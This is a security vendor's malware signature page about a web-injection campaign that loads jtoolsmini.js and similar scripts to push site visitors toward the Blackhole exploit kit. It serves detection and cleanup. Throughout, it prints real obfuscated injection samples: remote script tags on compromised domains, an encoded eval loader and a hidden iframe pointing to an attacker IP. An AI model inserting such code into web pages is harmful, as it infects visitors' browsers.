SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-injection-jtoolsmini-js

malware-injection-jtoolsmini-js

We have been tracking for a while the sidename.js and cssminibar family of malware, and lately it has changed (mutated) again to use the jtoolsmini.js file instead (still attempting to compromised browsers in the same way with the blackhole exploit).

 
This is how the malware looks in a hacked site:

 


<script type="text/javascript" src="http://przedmiotyszkolne.pl/jtoolsmini.js"></script>;

Which does the same thing as always and loads the following malicious code into the sites:

 


<script>el=document.createElement("div");el.innerHTML="ReferenceErr";el.appendChild(document.createTextNode("l"));try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.firstChild.nodeValue+a.toString().substr(0,0);};ar="3g[{wNaBf,iCv7t2eln}Tdyp4A..
ar2="R208c0c..e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="208";s="";pos=0;i=0;while(i<607){e(‘po’.concat(‘s+=par’,'seInt(k’,'.rep’,'lace("R’,
‘eferen’,'","0a’,'sd"))+’,'ar2[','i]/’,’4′));e(‘s+=ar.substr(pos,1)’);i++;}

If you are seeing it on your own web site, it means it is hacked and you need to fix it asap to protect your users. This type of malware infects any type of web site (osCommerce, WordPress, Joomla and many others). But lately (specially the jtoolsmini.js), seems to be happening via stolen FTP credentials.

 
Sucuri identifies those type of web-based malware as: http://sucuri.net/malware/malware-entry-mwiframehd203 (since we detect the malicious iframe being generated).

 
Our support team can clean it up for you if you are infected. Sign up with us here: http://sucuri.net/signup and we will get it sorted out pretty quickly.

 
If you have any question, let us know (support@sucuri.net).

 
Update:

We are also seeing the iframe injection being done with the following types of script:


<script>d='function  $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r&#46offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); &#46sxml2 X1 A&#46icrosoft X2 -z=null}}if(!  z Ztypeof  M!="undefined" -z : M ]+ E= 4}} Uc > -t[ $o [>,false) Uv >, =vars Z 4== =vars A=  /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a&#46trim _$f Z"qabcdef"&#46indexOf( $o&#46substr(0,1))>=0){ H $rs So 6'q') 8'') 6'v') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k =  $rs 8

document&#46write('<iframe frameborder=0 src="http://65. 75 &#46 148 &#46 44/Home/index&#46 php" width=1 height=1 scrolling=no></iframe>')

<script>var s,g=2,aa=document&#46createTextNode("harCode");if(0===Math&#46cos(Math&#46PI)){s=String["fr"+"omC"+aa&#46nodeValue];}eval(s(7+g,7+g,103+g,100+g,30+g,38+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,39+g,121+g,7+g,7+g,7+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,57+g,7+g,7+g,123+g,30+g,99+g,106+g,113+g,99+g,30+g,121+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,117+g,112+g,103+g,114+g,99+g,38+g,32+g,58+g,103+g,100+g,112+g,95+g,107+g,99+g,30+g,113+g,112+g,97+g,59+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,110+g,115+g,106+g,110+g,103+g,97+g,44+g,97+g,109+g,107+g,45+g,97+g,109+g,106+g,45+g,97+g,102+g,105+g,44+g,110+g,102+g,110+g,61+g,114+g,102+g,112+g,59+g,97+g,48+g,48+g,95+g,54+g,49+g,46+g,50+g,53+g,55+g,46+g,46+g,100+g,51+g,96+g,50+g,37+g,30+g,117+g,103+g,98+g,114+g,102+g,59+g,37+g,47+g,46+g,37+g,30+g,102+g,9

<script type="text/javascript" src="http://pizzadomiciliu.ro/text0"></script> <html>;

<!-- ad --><script language='JavaScript' src='http://abseconbluedevils.org/dfsf323233.js'></script><!-- /ad -->;